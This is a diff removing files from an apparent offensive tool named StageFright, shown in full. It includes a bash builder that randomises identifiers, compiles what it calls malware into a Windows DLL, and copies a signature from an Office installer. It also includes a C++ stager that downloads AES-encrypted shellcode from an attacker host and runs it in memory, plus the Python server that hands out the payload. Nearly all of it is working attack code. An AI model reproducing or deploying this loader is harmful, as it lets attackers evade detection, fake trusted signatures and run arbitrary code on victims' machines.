-perl -pe 's/PAYVAL/`cat shell5.txt`/ge' -i StageFright/TCPDLL/Resources/con.py
-sed -i "s/{/[/g" -i StageFright/TCPDLL/Resources/con.py
-sed -i "s/}/]/g" -i StageFright/TCPDLL/Resources/con.py
-sed -i "s/;//g" -i StageFright/TCPDLL/Resources/con.py
-python3 StageFright/TCPDLL/Resources/con.py
-#rm StageFright/TCPDLL/Resources/con.py
-mv payload.bin $SHELLCODEFILE
-sleep 2
-
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
-RandomE=$(cat shell.txt)
-sed -i "s/RandomE/$RandomE/g" StageFright/TCPDLL/Resources/template.cpp
-
-
-#Replace IP, PORT and SHELLCODEFILE
-sed -i "s/ENTRYPOINT/$ENTRYPOINT/g" StageFright/TCPDLL/Resources/template.cpp
-sed -i "s/HOSTIP/$HOSTIP/g" StageFright/TCPDLL/Resources/template.cpp
-sed -i "s/PORTY/$PORTY/g" StageFright/TCPDLL/Resources/template.cpp
-sed -i "s/SHELLCODEFILE/$SHELLCODEFILE/g" StageFright/TCPDLL/Resources/template.cpp
-#Replacing Values
-
-# Get Payload From URL Function
-
-#FindShare
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
-Random1=$(cat shell.txt)
-sed -i "s/Random1/$Random1/g" StageFright/TCPDLL/Resources/template.cpp
-
-#pPayloadBytes
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
-Random2=$(cat shell.txt)
-sed -i "s/Random2/$Random2/g" StageFright/TCPDLL/Resources/template.cpp
-
-#sPayloadSize
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
-Random3=$(cat shell.txt)
-sed -i "s/Random3/$Random3/g" StageFright/TCPDLL/Resources/template.cpp
-
-#sPayloadSize
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
-Random4=$(cat shell.txt)
-
-sed -i "s/Random3/$Random3/g" StageFright/TCPDLL/Resources/template.cpp
-#bSTATE
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-5} | head -n 1 > shell.txt
-Random5=$(cat shell.txt)
-sed -i "s/Random5/$Random5/g" StageFright/TCPDLL/Resources/template.cpp
-
-#sSize
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-7} | head -n 1 > shell.txt
-Random6=$(cat shell.txt)
-sed -i "s/Random6/$Random6/g" StageFright/TCPDLL/Resources/template.cpp
-
-#hInternet
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
-Random7=$(cat shell.txt)
-sed -i "s/Random7/$Random7/g" StageFright/TCPDLL/Resources/template.cpp
-
-#dwBytesRead
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-13} | head -n 1 > shell.txt
-Random8=$(cat shell.txt)
-sed -i "s/Random8/$Random8/g" StageFright/TCPDLL/Resources/template.cpp
-
-#pBytes
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
-Random9=$(cat shell.txt)
-sed -i "s/Random9/$Random9/g" StageFright/TCPDLL/Resources/template.cpp
-
-#PAYLOAD
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
-RandomA=$(cat shell.txt)
-sed -i "s/RandomA/$RandomA/g" StageFright/TCPDLL/Resources/template.cpp
-
-#Sleep Function
-
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
-RandomJ=$(cat shell.txt)
-sed -i "s/RandomJ/$RandomJ/g" StageFright/TCPDLL/Resources/template.cpp
-
-#AES KEY NAME
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
-RandomK=$(cat shell.txt)
-sed -i "s/RandomK/$RandomK/g" StageFright/TCPDLL/Resources/template.cpp
-
-# Main Function
-
-#Bytes
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
-RandomB=$(cat shell.txt)
-sed -i "s/RandomB/$RandomB/g" StageFright/TCPDLL/Resources/template.cpp
-
-#Size
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
-RandomC=$(cat shell.txt)
-sed -i "s/RandomC/$RandomC/g" StageFright/TCPDLL/Resources/template.cpp
-
-#Compile
-
-echo -e ${yellow}"+++Compiling Malware+++"${clear}
-x86_64-w64-mingw32-g++ -shared -o $MALWARE StageFright/TCPDLL/Resources/template.cpp -lws2_32 -lntdll -static-libgcc -static-libstdc++ -Wl,--subsystem,windows -O2 -Wno-narrowing -fpermissive >/dev/null 2>&1
-echo ""
-sleep 2
-rm shell*
-echo -e ${yellow}"***Malware Compiled***"${clear}
-echo ""
-sleep 2
-echo -e ${yellow}"+++Adding Binary Signature+++"${clear}
-echo ""
-sleep 2
-python3 python3 StageFright/Resources/SigThief/sigthief.py -i StageFright/Resources/OfficeSetup.exe-t $MALWARE -o signed$MALWARE >/dev/null 2>&1
-mv signed$MALWARE $MALWARE
-echo -e ${yellow}"***Signature Added. Happy Hunting!**"${clear}
-echo ""

StageFright/StageFright/StageFright/TCPDLL/conv.py

@@ -1,4 +0,0 @@
-buf=PAYVAL 
-payload = bytes(bytearray(buf))
-with open('payload.bin', 'wb') as f:
-    f.write(payload)

StageFright/StageFright/StageFright/TCPDLL/template.cpp

@@ -1,188 +0,0 @@
-#include <winsock2.h>
-#include <ws2tcpip.h>
-#include <windows.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include <wincrypt.h>
-#pragma comment(lib, "crypt32.lib")
-#pragma comment(lib, "advapi32")
-#include <psapi.h>
-
-// Define the shellcode function signature
-typedef void (*RandomA)();
-
-bool Random1(const char* Random2, int Random3, const char* Random4, char*& Random5, size_t& Random6) {
-    WSADATA wsaData;
-    if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) {
-        printf("Failed to initialize Winsock.\n");
-        return false;
-    }
-
-    SOCKET clientSocket = socket(AF_INET, SOCK_STREAM, 0);
-    if (clientSocket == INVALID_SOCKET) {
-        perror("Error creating socket");
-        WSACleanup();
-        return false;
-    }
-
-    sockaddr_in serverAddress{};
-    serverAddress.sin_family = AF_INET;
-    serverAddress.sin_port = htons(Random3);
-    serverAddress.sin_addr.s_addr = inet_addr(Random2);
-
-    if (serverAddress.sin_addr.s_addr == INADDR_NONE) {
-        perror("Invalid address/Address not supported");
-        closesocket(clientSocket);
-        WSACleanup();
-        return false;
-    }
-
-    if (connect(clientSocket, (struct sockaddr*)&serverAddress, sizeof(serverAddress)) < 0) {
-        perror("Connection failed");
-        closesocket(clientSocket);
-        WSACleanup();
-        return false;
-    }
-
-    // Send the length of the file path first
-    size_t Random4Len = strlen(Random4);
-    printf("Sending file path length: %zu\n", Random4Len);
-    send(clientSocket, reinterpret_cast<char*>(&Random4Len), sizeof(Random4Len), 0);
-
-    // Send the file path to the server
-    printf("Sending file path: %s\n", Random4);
-    send(clientSocket, Random4, Random4Len, 0);
-
-    int fileSize;
-    int bytesRead = recv(clientSocket, reinterpret_cast<char*>(&fileSize), sizeof(fileSize), 0);
-    if (bytesRead != sizeof(fileSize)) {
-        printf("Error receiving file size: %d\n", WSAGetLastError());
-        closesocket(clientSocket);
-        WSACleanup();
-        return false;
-    }
-
-    fileSize = ntohl(fileSize); // Convert from network byte order to host byte order
-
-    printf("Received file size: %d\n", fileSize);
-    // Receive and save the binary data in a dynamically allocated buffer
-    Random5 = new char[fileSize];
-    if (Random5 == nullptr) {
-        printf("Error allocating memory for binary data.\n");
-        closesocket(clientSocket);
-        WSACleanup();
-        return false;
-    }
-
-    size_t totalSize = 0;
-    while (totalSize < fileSize) {
-        bytesRead = recv(clientSocket, Random5 + totalSize, fileSize - totalSize, 0);
-        if (bytesRead <= 0) {
-            printf("Error receiving binary data: %d\n", WSAGetLastError());
-            delete[] Random5;
-            closesocket(clientSocket);
-            WSACleanup();
-            return false;
-        }
-        totalSize += bytesRead;
-    }
-
-    // Close the socket
-    closesocket(clientSocket);
-
-    Random6 = totalSize;
-    printf("Received data size: %zu\n", Random6);
-
-    return true;
-}
-
-int Random7(char* Random8, unsigned int Random8_len, char* Random9, size_t Random9len) {
-    HCRYPTPROV hProv;
-    HCRYPTHASH hHash;
-    HCRYPTKEY hKey;
-
-    if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
-        return -1;
-    }
-    if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
-        return -1;
-    }
-    if (!CryptHashData(hHash, (BYTE*)Random9, (DWORD)Random9len, 0)) {
-        return -1;
-    }
-    if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
-        return -1;
-    }
-
-    if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, Random8, &Random8_len)) {
-        return -1;
-    }
-
-    CryptReleaseContext(hProv, 0);
-    CryptDestroyHash(hHash);
-    CryptDestroyKey(hKey);
-
-    return 0;
-}
-
-char Random9[] = KEYVALUE;
-
-extern "C" void CALLBACK ENTRYPOINT(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow) {
-    const char* Random2 = "HOSTIP";        // Replace with the actual server IP
-    int Random3 = PORTY;                     // Replace with the actual server port
-    const char* Random4 = "SHELLCODEFILE";   // Replace with the actual file path on the server
-
-    char* Random5;
-    size_t Random6;
-
-    if (Random1(Random2, Random3, Random4, Random5, Random6)) {
-        printf("Binary data received successfully.\n");
-
-        // Print received data size for debugging
-        printf("Received data size: %zu\n", Random6);
-
-        Random7((char*)Random5, Random6, Random9, sizeof(Random9));
-
-        // Allocate executable memory with READ, WRITE permissions
-        LPVOID executableMemory = VirtualAlloc(NULL, Random6, MEM_COMMIT, PAGE_READWRITE);
-        if (executableMemory == NULL) {
-            DWORD error = GetLastError();
-            printf("Error allocating executable memory: %d\n", error);
-            delete[] Random5;
-            return;
-        }
-
-        // Copy binary data to the executable memory
-        memcpy(executableMemory, Random5, Random6);
-
-        // Change the protection to PAGE_EXECUTE_READ
-        DWORD oldProtect;
-        if (!VirtualProtect(executableMemory, Random6, PAGE_EXECUTE_READ, &oldProtect)) {
-            DWORD error = GetLastError();
-            printf("Error changing memory protection: %d\n", error);
-            VirtualFree(executableMemory, 0, MEM_RELEASE);
-            delete[] Random5;
-            return;
-        }
-
-        // Create a function pointer to the shellcode
-        RandomA RandomB = reinterpret_cast<RandomA>(executableMemory);
-
-        // Call the shellcode function
-        printf("Executing shellcode...\n");
-        RandomB();
-
-        // No freeing of allocated memory in this POC
-
-        printf("Shellcode executed successfully.\n");
-
-        // Free allocated memory
-        delete[] Random5;
-    } else {
-        printf("Failed to receive binary data.\n");
-        return;
-    }
-}
-
-

StageFright/StageFright/setup.sh

@@ -1,8 +0,0 @@
-#!/bin/bash
-apt update -y
-cd StageFright/Resources/
-apt-get install mingw-w64 -y
-git clone https://github.com/secretsquirrel/SigThief.git
-mv SigThief/ StageFright/Resources/
-pip install pycryptodome
-

StageFright/StageFright/tcp_server.py

@@ -1,69 +0,0 @@
-import socketserver
-import os
-
-class MyHandler(socketserver.BaseRequestHandler):
-    def handle(self):
-        print("Connection received from:", self.client_address)
-
-        try:
-            # Receive file path length
-            path_len_bytes = self.request.recv(8)
-            if not path_len_bytes:
-                print("Error receiving file path length.")
-                return
-
-            path_len = int.from_bytes(path_len_bytes, byteorder='little')  # Change byte order to 'little'
-            print(f"Received file path length: {path_len}")
-
-            # Receive file path
-            file_path_bytes = b""
-            while len(file_path_bytes) < path_len:
-                received_data = self.request.recv(path_len - len(file_path_bytes))
-                if not received_data:
-                    print("Error receiving file path.")
-                    return
-                file_path_bytes += received_data
-
-            file_name = file_path_bytes.decode('utf-8')
-            print("Received file name:", file_name)
-
-            # Check if the file exists
-            file_path = os.path.join(os.getcwd(), file_name)
-            print("Absolute file path:", file_path)
-            if os.path.exists(file_path):
-                print("File found:", file_path)
-
-                # Read file data
-                with open(file_path, 'rb') as file:
-                    file_data = file.read()
-
-                # Print the size before sending
-                file_size = len(file_data)
-                print("Size of file:", file_size)
-
-                # Send file size to the client
-                self.request.sendall(file_size.to_bytes(4, byteorder='big'))
-
-                # Send file data back to the client
-                self.request.sendall(file_data)
-                print("File data sent successfully.")
-
-            else:
-                print("File not found:", file_path)
-                self.request.sendall(b"FILE_NOT_FOUND")
-
-        except Exception as e:
-            print("Error:", str(e))
-            self.request.sendall(b"SERVER_ERROR")
-
-if __name__ == "__main__":
-    host, port = "192.168.1.12", 8080
-    server = socketserver.TCPServer((host, port), MyHandler)
-    print(f"Server listening on {host}:{port}")
-
-    try:
-        server.serve_forever()
-    except KeyboardInterrupt:
-        print("Server shutting down.")
-        server.shutdown()
-